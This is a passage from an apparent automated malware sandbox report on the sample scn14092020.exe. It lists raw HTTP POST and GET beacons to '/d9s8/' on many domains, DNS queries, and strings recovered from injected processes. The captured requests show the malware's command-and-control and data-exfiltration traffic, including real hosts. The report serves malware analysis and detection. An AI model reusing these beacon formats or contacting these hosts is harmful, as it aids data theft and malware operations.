79 43 45 55 79 68 32 59 66 4e 31 6a 5a 66 4d 65 6a 7a 6e 77 39 47 70 58 75 36 6f 75 32 6a 31 63 49 6e 7e 6e 35 43 6a 66 35 72 70 4a 71 71 37 31 7e 4b 59 41 70 52 39 4e 76 4d 36 47 42 34 33 34 33 33 5a 54 75 70 39 61 77 72 43 65 34 78 35 51 65 6a 51 36 34 33 71 68 68 5a 7e 32 79 55 6f 6f 6c 4b 4b 74 45 51 29 2e 00 00 00 00 00 00 00 00 Data Ascii: jDHXN=FbjcCpuQKSzpM2eqFZiZlt34AEYv1xuDIOVGp0KtWT3CWzX4sJHk3RIoQxL1zaSnPB6G9We2UgM1FfMNPYBar1F0fpRi8juYWee-H1yh43uwS15WkmPB(WJBWcBKw2jg3fWcplVNVl~ePy1G8nFhkLZ5kUZGChc4BmIIs0iSSPUWevZq7M0SefMiCWT2D_72ej6OYTx2(Dust4seFBs7ZHqtJVVM2FTm42R1n93IYLGB5OYAFDt6g0(2HzQU4Ms2fdvazbGNJXOY7KYKwwN_L88Ak3BQq1hg1Aplfs7TAfDKyCEUyh2YfN1jZfMejznw9GpXu6ou2j1cIn~n5Cjf5rpJqq71~KYApR9NvM6GB43433ZTup9awrCe4x5QejQ643qhhZ~2yUoolKKtEQ).
          Source: global trafficHTTP traffic detected: POST /d9s8/ HTTP/1.1Host: www.aktivasi-asuransi-bukalapak.comConnection: closeContent-Length: 411Cache-Control: no-cacheOrigin: http://www.aktivasi-asuransi-bukalapak.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://www.aktivasi-asuransi-bukalapak.com/d9s8/Accept-Language: en-USAccept-Encoding: gzip, deflateData Raw: 6a 44 48 58 4e 3d 39 53 59 6c 46 66 56 34 54 32 31 36 57 77 71 71 64 77 76 69 56 37 56 36 6b 59 4d 78 34 30 73 73 67 78 44 70 48 49 28 32 50 34 65 78 52 6d 44 38 54 39 67 56 4b 67 37 53 70 4c 6d 4c 68 53 78 55 51 2d 4a 79 78 49 56 39 4a 51 38 56 63 7a 38 6a 6c 77 71 79 44 4b 4a 4c 51 6c 74 78 55 30 53 4a 77 69 4d 79 39 34 55 72 6a 45 58 4a 4c 4c 65 30 47 50 56 4f 63 59 54 41 79 39 58 76 30 4b 41 39 5a 5f 7e 4d 4d 74 74 64 79 57 35 65 42 73 51 67 55 2d 55 30 31 75 70 66 4d 77 6d 48 36 56 49 65 4f 64 6b 6e 35 52 71 61 6b 6c 45 55 66 37 42 30 58 65 6b 46 6e 45 45 4a 71 66 44 68 73 53 46 73 58 56 36 78 4c 77 52 75 4d 69 46 69 51 50 48 33 34 4c 35 69 4d 46 28 62 4a 71 59 5a 47 57 51 30 54 30 41 75 31 7a 78 2d 49 32 53 35 68 51 71 77 6a 5a 44 73 70 30 32 32 57 43 30 54 38 35 49 41 75 35 79 49 4d 6d 6e 4d 66 65 41 53 68 32 38 78 4f 43 68 42 6e 59 57 54 70 44 62 50 53 4f 72 50 4d 72 31 5a 75 36 64 68 45 51 57 6a 5a 53 62 36 55 78 51 6d 47 73 79 52 73 5a 42 6a 77 75 78 68 6d 70 6b 71 54 78 77 44 4e 4e 41 41 6e 75 56 55 50 71 47 6d 59 41 5a 4b 30 4e 4a 6f 56 6d 6d 42 55 7a 4e 6a 69 5f 66 74 6a 30 4c 35 73 41 6f 32 63 74 48 55 42 5a 6b 52 76 69 30 70 4a 41 51 7a 4d 5f 76 62 34 32 4d 70 34 66 6c 4f 41 73 4e 73 34 51 29 2e 00 00 00 00 00 00 00 00 Data Ascii: jDHXN=9SYlFfV4T216WwqqdwviV7V6kYMx40ssgxDpHI(2P4exRmD8T9gVKg7SpLmLhSxUQ-JyxIV9JQ8Vcz8jlwqyDKJLQltxU0SJwiMy94UrjEXJLLe0GPVOcYTAy9Xv0KA9Z_~MMttdyW5eBsQgU-U01upfMwmH6VIeOdkn5RqaklEUf7B0XekFnEEJqfDhsSFsXV6xLwRuMiFiQPH34L5iMF(bJqYZGWQ0T0Au1zx-I2S5hQqwjZDsp022WC0T85IAu5yIMmnMfeASh28xOChBnYWTpDbPSOrPMr1Zu6dhEQWjZSb6UxQmGsyRsZBjwuxhmpkqTxwDNNAAnuVUPqGmYAZK0NJoVmmBUzNji_ftj0L5sAo2ctHUBZkRvi0pJAQzM_vb42Mp4flOAsNs4Q).
          Source: global trafficHTTP traffic detected: POST /d9s8/ HTTP/1.1Host: www.hqxmf.comConnection: closeContent-Length: 411Cache-Control: no-cacheOrigin: http://www.hqxmf.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://www.hqxmf.com/d9s8/Accept-Language: en-USAccept-Encoding: gzip, deflateData Raw: 6a 44 48 58 4e 3d 6f 69 55 78 4d 6a 4b 44 46 67 6f 4c 38 66 49 6f 79 44 48 49 50 5a 37 43 4c 34 6d 45 4c 43 61 54 44 6a 4f 34 47 79 74 46 6d 32 70 79 56 49 74 59 66 44 72 35 76 4e 35 5a 56 39 42 64 36 5f 49 62 49 48 42 32 75 78 63 6d 59 50 7a 55 49 78 69 73 6d 4c 57 59 73 75 78 65 7a 4e 7e 75 54 6d 54 4e 38 76 72 58 31 73 52 5f 6e 52 6d 6c 73 58 6a 6a 55 4e 69 67 6a 47 37 30 63 6e 63 71 70 58 48 45 49 30 63 50 45 71 50 5a 4b 59 79 74 67 32 45 59 51 66 62 5f 59 39 68 41 30 4a 55 58 69 37 4a 39 79 34 64 63 4d 4f 4f 62 49 58 74 37 41 5a 4c 47 48 6e 4c 65 52 57 68 32 28 66 6d 44 39 2d 6c 62 47 47 61 62 54 5f 33 59 52 65 47 68 73 49 75 50 36 51 7a 48 42 30 4f 53 4b 4e 6b 71 44 65 4d 41 52 79 39 50 41 69 75 2d 4c 72 6f 41 4d 5f 71 4f 61 70 4e 4c 4f 38 4a 74 74 41 28 61 57 5f 35 74 6b 47 31 45 37 51 4b 74 4c 43 34 55 6b 33 56 33 62 53 4c 58 37 48 45 36 46 4b 78 73 65 6f 33 75 67 5f 65 5a 77 32 39 70 63 76 6b 75 6a 34 78 71 4d 72 47 52 46 72 66 4d 75 53 69 6a 38 59 7a 4e 4c 6a 56 59 77 6f 46 6e 4f 7a 37 72 7e 43 4c 59 57 5f 6d 7a 78 4b 61 6e 71 43 4b 66 46 69 36 73 34 6a 79 5a 31 69 64 53 38 2d 5a 68 4f 5a 4d 65 64 64 35 54 28 64 77 34 4c 59 39 59 33 74 65 41 68 75 51 5a 6b 44 69 70 42 4f 4b 71 70 69 68 53 50 77 29 2e 00 00 00 00 00 00 00 00 Data Ascii: jDHXN=oiUxMjKDFgoL8fIoyDHIPZ7CL4mELCaTDjO4GytFm2pyVItYfDr5vN5ZV9Bd6_IbIHB2uxcmYPzUIxismLWYsuxezN~uTmTN8vrX1sR_nRmlsXjjUNigjG70cncqpXHEI0cPEqPZKYytg2EYQfb_Y9hA0JUXi7J9y4dcMOObIXt7AZLGHnLeRWh2(fmD9-lbGGabT_3YReGhsIuP6QzHB0OSKNkqDeMARy9PAiu-LroAM_qOapNLO8JttA(aW_5tkG1E7QKtLC4Uk3V3bSLX7HE6FKxseo3ug_eZw29pcvkuj4xqMrGRFrfMuSij8YzNLjVYwoFnOz7r~CLYW_mzxKanqCKfFi6s4jyZ1idS8-ZhOZMedd5T(dw4LY9Y3teAhuQZkDipBOKqpihSPw).
          Source: global trafficHTTP traffic detected: POST /d9s8/ HTTP/1.1Host: www.hivepublications.comConnection: closeContent-Length: 411Cache-Control: no-cacheOrigin: http://www.hivepublications.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://www.hivepublications.com/d9s8/Accept-Language: en-USAccept-Encoding: gzip, deflateData Raw: 6a 44 48 58 4e 3d 4e 47 32 7a 6e 72 74 48 66 50 79 54 71 5f 54 42 31 37 63 67 58 4f 77 4f 4a 32 44 74 48 49 6c 52 55 55 78 43 47 65 71 58 28 69 62 41 4d 46 52 4c 50 4a 7e 71 58 51 6d 67 7a 37 7a 63 31 52 49 47 4a 4d 62 31 4c 57 7a 35 79 45 75 78 39 59 48 63 77 63 30 50 47 6c 39 4a 28 37 55 56 79 64 52 34 43 62 55 49 57 4f 38 77 6c 6e 69 65 34 56 74 6c 73 41 55 64 35 64 55 6f 4f 73 55 4b 36 2d 48 48 30 42 66 52 63 53 6f 32 44 73 6e 44 36 38 4a 33 79 42 31 4b 50 74 4a 37 4b 74 75 4a 55 57 5a 71 4c 71 72 30 56 6e 39 5a 69 41 50 58 57 44 55 50 5a 6d 79 35 45 65 43 72 70 47 72 55 46 4a 4a 39 32 30 58 71 72 39 52 34 4b 73 4d 54 6c 44 50 6f 56 69 47 49 66 7a 58 39 4e 77 73 4e 61 46 65 4e 53 5f 65 6f 53 5f 66 65 62 4d 4d 45 4b 56 43 5f 32 61 46 4f 70 4d 6a 77 68 31 45 2d 4d 35 73 62 4b 6d 77 4f 73 6d 34 66 79 56 6d 74 50 6c 38 41 70 6e 41 4e 35 34 78 58 36 54 69 4f 62 4e 46 5f 6b 74 31 62 7a 47 30 69 79 31 30 6d 59 50 50 77 33 45 61 38 54 79 64 7a 70 55 4c 54 68 42 56 38 63 71 74 59 6a 59 34 74 53 6b 4b 5f 71 74 4d 38 72 37 72 38 39 54 43 59 56 5a 55 4a 64 63 69 7a 52 61 45 55 6c 59 4c 64 59 39 4e 5f 72 6b 34 50 56 50 77 79 4a 75 32 4d 6a 45 52 72 45 70 51 52 48 30 64 67 78 33 47 6c 7e 72 31 49 7e 6f 65 36 44 51 29 2e 00 00 00 00 00 00 00 00 Data Ascii: jDHXN=NG2znrtHfPyTq_TB17cgXOwOJ2DtHIlRUUxCGeqX(ibAMFRLPJ~qXQmgz7zc1RIGJMb1LWz5yEux9YHcwc0PGl9J(7UVydR4CbUIWO8wlnie4VtlsAUd5dUoOsUK6-HH0BfRcSo2DsnD68J3yB1KPtJ7KtuJUWZqLqr0Vn9ZiAPXWDUPZmy5EeCrpGrUFJJ920Xqr9R4KsMTlDPoViGIfzX9NwsNaFeNS_eoS_febMMEKVC_2aFOpMjwh1E-M5sbKmwOsm4fyVmtPl8ApnAN54xX6TiObNF_kt1bzG0iy10mYPPw3Ea8TydzpULThBV8cqtYjY4tSkK_qtM8r7r89TCYVZUJdcizRaEUlYLdY9N_rk4PVPwyJu2MjERrEpQRH0dgx3Gl~r1I~oe6DQ).
          Source: global trafficHTTP traffic detected: POST /d9s8/ HTTP/1.1Host: www.chehol.directoryConnection: closeContent-Length: 411Cache-Control: no-cacheOrigin: http://www.chehol.directoryUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://www.chehol.directory/d9s8/Accept-Language: en-USAccept-Encoding: gzip, deflateData Raw: 6a 44 48 58 4e 3d 67 67 31 6f 6b 32 43 76 35 31 54 67 59 49 6b 5a 57 64 70 67 32 31 65 4f 6c 72 6e 46 4a 78 63 59 6d 4e 63 71 6f 6f 6c 47 72 6c 67 6a 46 72 33 6f 49 42 6c 31 72 6e 7a 41 39 36 72 4c 28 5f 28 37 32 32 50 67 50 5a 68 79 62 4d 39 66 35 4a 39 70 76 79 7e 62 35 73 6d 76 47 4f 46 36 6d 43 69 6f 61 4f 74 2d 39 6f 76 4d 4e 4c 47 4e 35 73 44 31 47 2d 74 58 52 4c 72 32 7a 2d 76 52 62 57 71 66 55 76 56 54 59 68 51 61 57 69 70 62 4b 52 6a 78 6a 6c 66 53 34 76 66 6e 51 30 52 55 38 34 31 64 63 30 52 70 73 59 48 56 45 65 54 4c 6a 33 63 57 62 72 6b 4f 52 4c 30 58 44 4b 71 6e 4c 57 5a 55 55 4e 6c 43 67 66 70 54 39 33 73 48 53 4d 66 43 6d 73 62 6d 51 74 68 64 7e 43 67 7a 39 6e 6f 33 66 34 6e 79 6a 44 38 47 31 4f 50 4b 4e 79 6a 66 6a 5f 68 44 34 4c 4d 50 62 69 4f 64 68 48 34 47 38 46 38 52 55 47 79 54 49 51 71 61 30 6b 62 43 55 66 46 62 43 59 74 64 50 33 33 49 55 56 30 55 42 76 64 4b 78 79 4d 75 79 4b 76 6c 47 7a 63 67 70 4f 4b 34 51 67 74 74 5a 48 6e 45 77 6a 35 31 51 41 64 36 63 67 63 43 43 79 68 38 30 35 31 31 66 47 6d 68 41 36 44 33 63 76 34 70 32 4b 62 6d 45 45 43 64 69 55 59 2d 67 5a 50 59 52 6b 74 6d 7a 4b 74 5a 54 70 43 55 37 41 36 37 37 5f 47 34 72 6c 6b 67 79 42 56 35 4c 69 36 31 72 43 54 58 35 67 29 2e 00 00 00 00 00 00 00 00 Data Ascii: jDHXN=gg1ok2Cv51TgYIkZWdpg21eOlrnFJxcYmNcqoolGrlgjFr3oIBl1rnzA96rL(_(722PgPZhybM9f5J9pvy~b5smvGOF6mCioaOt-9ovMNLGN5sD1G-tXRLr2z-vRbWqfUvVTYhQaWipbKRjxjlfS4vfnQ0RU841dc0RpsYHVEeTLj3cWbrkORL0XDKqnLWZUUNlCgfpT93sHSMfCmsbmQthd~Cgz9no3f4nyjD8G1OPKNyjfj_hD4LMPbiOdhH4G8F8RUGyTIQqa0kbCUfFbCYtdP33IUV0UBvdKxyMuyKvlGzcgpOK4QgttZHnEwj51QAd6cgcCCyh80511fGmhA6D3cv4p2KbmEECdiUY-gZPYRktmzKtZTpCU7A677_G4rlkgyBV5Li61rCTX5g).
          Source: global trafficHTTP traffic detected: POST /d9s8/ HTTP/1.1Host: www.martjeje2.infoConnection: closeContent-Length: 411Cache-Control: no-cacheOrigin: http://www.martjeje2.infoUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://www.martjeje2.info/d9s8/Accept-Language: en-USAccept-Encoding: gzip, deflateData Raw: 6a 44 48 58 4e 3d 34 48 4d 37 4e 2d 6f 43 42 38 37 65 6e 6b 59 78 64 43 75 7a 7e 4e 35 4d 71 5a 56 48 74 38 35 37 66 4a 47 36 6b 34 4a 74 66 35 6d 32 51 2d 77 63 72 6b 49 4e 74 6d 71 34 52 36 70 49 77 72 4d 55 6b 66 4f 5a 39 69 71 65 39 62 6a 79 33 49 54 79 30 64 62 76 6f 52 46 6a 7a 64 55 38 58 36 58 48 4f 6b 42 65 43 61 6a 4c 35 46 75 55 6d 66 37 62 6d 79 61 76 68 55 39 31 56 31 43 45 76 74 51 33 6a 4f 56 71 73 53 4e 35 56 78 4f 5f 47 68 35 65 45 34 34 50 39 77 42 47 49 76 53 71 35 44 43 68 78 57 45 75 50 62 54 36 4b 75 5a 52 49 44 4e 39 38 4a 41 6c 75 6b 50 32 51 6f 67 75 62 42 77 4e 52 39 4b 6b 46 4d 79 31 59 46 46 41 32 54 59 67 4d 35 75 4c 38 6e 4d 67 53 4d 28 74 41 63 41 68 6c 69 56 69 31 4b 30 36 73 33 48 76 76 7a 67 56 41 64 36 44 76 49 52 45 39 76 71 78 74 57 79 75 6a 5a 4f 4f 47 54 4f 6e 28 34 6a 77 28 72 5a 45 53 67 43 56 79 52 4e 4e 46 72 4d 53 49 6b 35 71 4b 47 77 63 75 4d 70 76 55 34 7a 46 39 69 59 45 68 35 68 62 43 72 59 30 44 67 64 58 37 61 4e 51 63 30 76 4a 4b 61 52 48 4a 34 57 69 79 78 6b 6a 34 71 44 50 4b 68 7a 5a 6b 43 61 76 74 64 4b 70 77 39 45 76 37 44 7e 48 52 72 42 62 66 66 54 57 45 65 34 74 39 4f 51 63 79 54 63 42 41 70 58 79 31 72 77 34 66 76 63 7a 63 32 47 49 73 5a 6b 79 65 67 29 2e 00 00 00 00 00 00 00 00 Data Ascii: jDHXN=4HM7N-oCB87enkYxdCuz~N5MqZVHt857fJG6k4Jtf5m2Q-wcrkINtmq4R6pIwrMUkfOZ9iqe9bjy3ITy0dbvoRFjzdU8X6XHOkBeCajL5FuUmf7bmyavhU91V1CEvtQ3jOVqsSN5VxO_Gh5eE44P9wBGIvSq5DChxWEuPbT6KuZRIDN98JAlukP2QogubBwNR9KkFMy1YFFA2TYgM5uL8nMgSM(tAcAhliVi1K06s3HvvzgVAd6DvIRE9vqxtWyujZOOGTOn(4jw(rZESgCVyRNNFrMSIk5qKGwcuMpvU4zF9iYEh5hbCrY0DgdX7aNQc0vJKaRHJ4Wiyxkj4qDPKhzZkCavtdKpw9Ev7D~HRrBbffTWEe4t9OQcyTcBApXy1rw4fvczc2GIsZkyeg).
          Source: global trafficHTTP traffic detected: GET /d9s8/?Bh=chLTAJW8o&jDHXN=0JLOdGg1pxN6Gt1Bi/JSJ+sGVc5LpPYI1jRUQtJxPcLLDPheB182/GB7jVB+9emH0R5P HTTP/1.1Host: www.brasserie-lafayette.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /d9s8/?jDHXN=d6pEJxSdPSBH0MIO1uNgncpVh40baHTR/jhPmc3N2xeTp5EUHVGtu5D3SsniCJrPBB9M&Bh=chLTAJW8o HTTP/1.1Host: www.clicrhonealpes.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /d9s8/?Bh=chLTAJW8o&jDHXN=WJb/CysgWCw91yJWs6LNuDX/buU9ws/TxtuWb/JnOd32EuNV24o2CESIFihwpFgP5dzA HTTP/1.1Host: www.animalsnecessity.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /d9s8/?jDHXN=3OckiECOiD+psyI+NQjFIxWDb4gozbrDIe4cjEZ2xT/QUh3byTqlra9o3wyRY1odpqBV&Bh=chLTAJW8o HTTP/1.1Host: www.uuid.blueConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /d9s8/?Bh=chLTAJW8o&jDHXN=cO0bqnodE8Uodepscc2XXc+fybp4dBOkcNItlx0mXpHFPbxkNxOWsoUK9bPA0ZyiUQJd HTTP/1.1Host: www.keebcat.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /d9s8/?jDHXN=KZXmcMedBwfhNG72Yprv36X6G3gBjgWEN6ED81KrdGuEeSGip76GxhQuMQ345P+ATXiO&Bh=chLTAJW8o HTTP/1.1Host: www.revolucaomindfulness.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /d9s8/?Bh=chLTAJW8o&jDHXN=yQsfb6F+aE13Jx6qI3j1CMlHibkP501s7Hi6bb3WKNeqcCrzTo1bPmy/qNSTnwpHMJRP HTTP/1.1Host: www.aktivasi-asuransi-bukalapak.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /d9s8/?jDHXN=nggLSHHwBxgJuORrvzKJVs32BLSeJBWsdDbHUzpPnmBTU59XQSi8nYsaBuFg5MktW3Bd&Bh=chLTAJW8o HTTP/1.1Host: www.hqxmf.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /d9s8/?jDHXN=CECJ5NlVRfC6rcavsOdFHLgWBVmwF6tqPRsoe/u97wTXDE14KZP6Fmisn7GjwDc8cLbW&Bh=chLTAJW8o HTTP/1.1Host: www.hivepublications.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /d9s8/?Bh=chLTAJW8o&jDHXN=viBS6Wze00HUNqFEE58ery/tqe73OVEI1otdtPhhnn8HDYG2Px46lSa5vqP2//3Rjw/o HTTP/1.1Host: www.chehol.directoryConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /d9s8/?jDHXN=3F4BTbkTDsrb23tZAXb3hdJ3+Zxxneo5KOr91LRTQbT8RfY+vB5Yp2XFHspK9JZO7aDS&Bh=chLTAJW8o HTTP/1.1Host: www.martjeje2.infoConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: unknownDNS traffic detected: queries for: www.brasserie-lafayette.com
          Source: unknownHTTP traffic detected: POST /d9s8/ HTTP/1.1Host: www.clicrhonealpes.comConnection: closeContent-Length: 411Cache-Control: no-cacheOrigin: http://www.clicrhonealpes.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://www.clicrhonealpes.com/d9s8/Accept-Language: en-USAccept-Encoding: gzip, deflateData Raw: 6a 44 48 58 4e 3d 53 34 64 2d 58 57 65 72 4a 79 4e 59 71 63 39 53 72 34 59 45 39 4d 52 6e 74 39 41 55 50 6b 62 4c 72 45 41 75 7e 76 4c 57 34 67 61 6a 35 59 49 55 47 47 58 6d 6b 74 4f 6c 52 76 72 4d 48 72 7a 35 42 78 39 47 41 79 58 5f 39 61 44 31 54 35 4b 75 30 7a 65 66 7a 46 6b 4f 67 68 6d 78 69 4c 39 2d 58 67 68 33 53 6d 30 62 74 55 67 79 45 65 31 65 6e 43 45 71 4a 37 75 75 6b 70 44 72 68 45 50 74 65 68 77 6c 75 39 37 4d 6b 57 59 34 64 31 4e 6e 45 4b 55 5f 59 6c 55 63 49 65 35 46 70 6a 56 45 73 30 56 4c 6b 36 6d 56 61 41 74 5a 69 76 44 5f 67 77 64 6b 4a 5a 6e 68 61 58 4e 4b 41 4b 4c 78 68 4f 4e 59 54 57 6e 67 54 52 79 49 32 51 72 76 4a 41 6c 5a 73 63 79 75 44 51 4d 5a 4c 4e 53 61 32 4e 41 43 36 6f 6f 63 51 2d 39 54 54 7a 39 6c 69 6a 33 32 65 46 55 4c 62 6c 69 53 43 31 58 56 37 6d 34 55 6c 5a 30 2d 36 76 6d 65 62 74 7a 48 47 5f 55 44 73 55 63 59 4d 68 4b 46 53 52 4f 52 70 43 73 6b 6e 66 67 6f 54 6c 30 64 55 57 4d 61 62 65 7e 43 36 5f 67 7a 74 30 28 34 62 68 72 65 66 31 67 36 79 4e 61 6b 54 4d 4f 36 4c 37 37 37 52 58 51 34 6d 43 46 75 77 70 41 4e 7a 53 6d 64 6b 49 56 75 48 43 28 79 57 31 31 41 45 56 30 70 79 33 53 51 67 46 77 44 4e 43 6f 68 71 58 66 6f 61 55 56 4e 71 36 78 52 6e 50 69 63 61 37 6a 6b 6a 77 29 2e 00 00 00 00 00 00 00 00 Data Ascii: jDHXN=S4d-XWerJyNYqc9Sr4YE9MRnt9AUPkbLrEAu~vLW4gaj5YIUGGXmktOlRvrMHrz5Bx9GAyX_9aD1T5Ku0zefzFkOghmxiL9-Xgh3Sm0btUgyEe1enCEqJ7uukpDrhEPtehwlu97MkWY4d1NnEKU_YlUcIe5FpjVEs0VLk6mVaAtZivD_gwdkJZnhaXNKAKLxhONYTWngTRyI2QrvJAlZscyuDQMZLNSa2NAC6oocQ-9TTz9lij32eFULbliSC1XV7m4UlZ0-6vmebtzHG_UDsUcYMhKFSRORpCsknfgoTl0dUWMabe~C6_gzt0(4bhref1g6yNakTMO6L777RXQ4mCFuwpANzSmdkIVuHC(yW11AEV0py3SQgFwDNCohqXfoaUVNq6xRnPica7jkjw).
          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Mon, 14 Sep 2020 21:16:42 GMTContent-Type: text/html; charset=UTF-8Content-Length: 146Connection: closeData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
          Source: scn14092020.exeString found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0
          Source: scn14092020.exeString found in binary or memory: http://cacerts.digicert.com/DigiCertSHA2AssuredIDTimestampingCA.crt0
          Source: scn14092020.exeString found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0P
          Source: scn14092020.exeString found in binary or memory: http://crl3.digicert.com/sha2-assured-ts.crl02
          Source: scn14092020.exeString found in binary or memory: http://crl4.digicert.com/DigiCertAssuredIDRootCA.crl0:
          Source: scn14092020.exeString found in binary or memory: http://crl4.digicert.com/sha2-assured-ts.crl0
          Source: explorer.exe, 00000002.00000000.194508710.000000000BA46000.00000002.00000001.sdmpString found in binary or memory: http://fontfabrik.com
          Source: ipconfig.exe, 00000004.00000002.438848508.000000000352D000.00000004.00000001.sdmpString found in binary or memory: http://i1.cdn-image.com/__media__/pics/12471/logo.png)
          Source: ipconfig.exe, 00000004.00000002.438848508.000000000352D000.00000004.00000001.sdmpString found in binary or memory: http://i1.cdn-image.com/__media__/pics/12471/search-icon.png)
          Source: ipconfig.exe, 00000004.00000002.438848508.000000000352D000.00000004.00000001.sdmpString found in binary or memory: http://i2.cdn-image.com/__media__/js/min.js?v2.2
          Source: ipconfig.exe, 00000004.00000002.438848508.000000000352D000.00000004.00000001.sdmpString found in binary or memory: http://i2.cdn-image.com/__media__/pics/12471/kwbg.jpg)
          Source: ipconfig.exe, 00000004.00000002.438848508.000000000352D000.00000004.00000001.sdmpString found in binary or memory: http://i3.cdn-image.com/__media__/pics/12471/arrow.png)
          Source: ipconfig.exe, 00000004.00000002.438848508.000000000352D000.00000004.00000001.sdmpString found in binary or memory: http://i3.cdn-image.com/__media__/pics/12471/bodybg.png)
          Source: ipconfig.exe, 00000004.00000002.438848508.000000000352D000.00000004.00000001.sdmpString found in binary or memory: http://i3.cdn-image.com/__media__/pics/12471/libgh.png)
          Source: ipconfig.exe, 00000004.00000002.438848508.000000000352D000.00000004.00000001.sdmpString found in binary or memory: http://i4.cdn-image.com/__media__/fonts/ubuntu-b/ubuntu-b.eot
          Source: ipconfig.exe, 00000004.00000002.438848508.000000000352D000.00000004.00000001.sdmpString found in binary or memory: http://i4.cdn-image.com/__media__/fonts/ubuntu-b/ubuntu-b.eot?#iefix
          Source: ipconfig.exe, 00000004.00000002.438848508.000000000352D000.00000004.00000001.sdmpString found in binary or memory: http://i4.cdn-image.com/__media__/fonts/ubuntu-b/ubuntu-b.otf
          Source: ipconfig.exe, 00000004.00000002.438848508.000000000352D000.00000004.00000001.sdmpString found in binary or memory: http://i4.cdn-image.com/__media__/fonts/ubuntu-b/ubuntu-b.svg#ubuntu-b
          Source: ipconfig.exe, 00000004.00000002.438848508.000000000352D000.00000004.00000001.sdmpString found in binary or memory: http://i4.cdn-image.com/__media__/fonts/ubuntu-b/ubuntu-b.ttf
          Source: ipconfig.exe, 00000004.00000002.438848508.000000000352D000.00000004.00000001.sdmpString found in binary or memory: http://i4.cdn-image.com/__media__/fonts/ubuntu-b/ubuntu-b.woff
          Source: ipconfig.exe, 00000004.00000002.438848508.000000000352D000.00000004.00000001.sdmpString found in binary or memory: http://i4.cdn-image.com/__media__/fonts/ubuntu-b/ubuntu-b.woff2
          Source: ipconfig.exe, 00000004.00000002.438848508.000000000352D000.00000004.00000001.sdmpString found in binary or memory: http://i4.cdn-image.com/__media__/fonts/ubuntu-r/ubuntu-r.eot
          Source: ipconfig.exe, 00000004.00000002.438848508.000000000352D000.00000004.00000001.sdmpString found in binary or memory: http://i4.cdn-image.com/__media__/fonts/ubuntu-r/ubuntu-r.eot?#iefix
          Source: ipconfig.exe, 00000004.00000002.438848508.000000000352D000.00000004.00000001.sdmpString found in binary or memory: http://i4.cdn-image.com/__media__/fonts/ubuntu-r/ubuntu-r.otf
          Source: ipconfig.exe, 00000004.00000002.438848508.000000000352D000.00000004.00000001.sdmpString found in binary or memory: http://i4.cdn-image.com/__media__/fonts/ubuntu-r/ubuntu-r.svg#ubuntu-r
          Source: ipconfig.exe, 00000004.00000002.438848508.000000000352D000.00000004.00000001.sdmpString found in binary or memory: http://i4.cdn-image.com/__media__/fonts/ubuntu-r/ubuntu-r.ttf
          Source: ipconfig.exe, 00000004.00000002.438848508.000000000352D000.00000004.00000001.sdmpString found in binary or memory: http://i4.cdn-image.com/__media__/fonts/ubuntu-r/ubuntu-r.woff
          Source: ipconfig.exe, 00000004.00000002.438848508.000000000352D000.00000004.00000001.sdmpString found in binary or memory: http://i4.cdn-image.com/__media__/fonts/ubuntu-r/ubuntu-r.woff2
          Source: ipconfig.exe, 00000004.00000002.438848508.000000000352D000.00000004.00000001.sdmpString found in binary or memory: http://i4.cdn-image.com/__media__/pics/12471/libg.png)
          Source: scn14092020.exeString found in binary or memory: http://ocsp.digicert.com0C
          Source: scn14092020.exeString found in binary or memory: http://ocsp.digicert.com0O
          Source: ipconfig.exe, 00000004.00000002.438848508.000000000352D000.00000004.00000001.sdmpString found in binary or memory: http://perldancer.org/
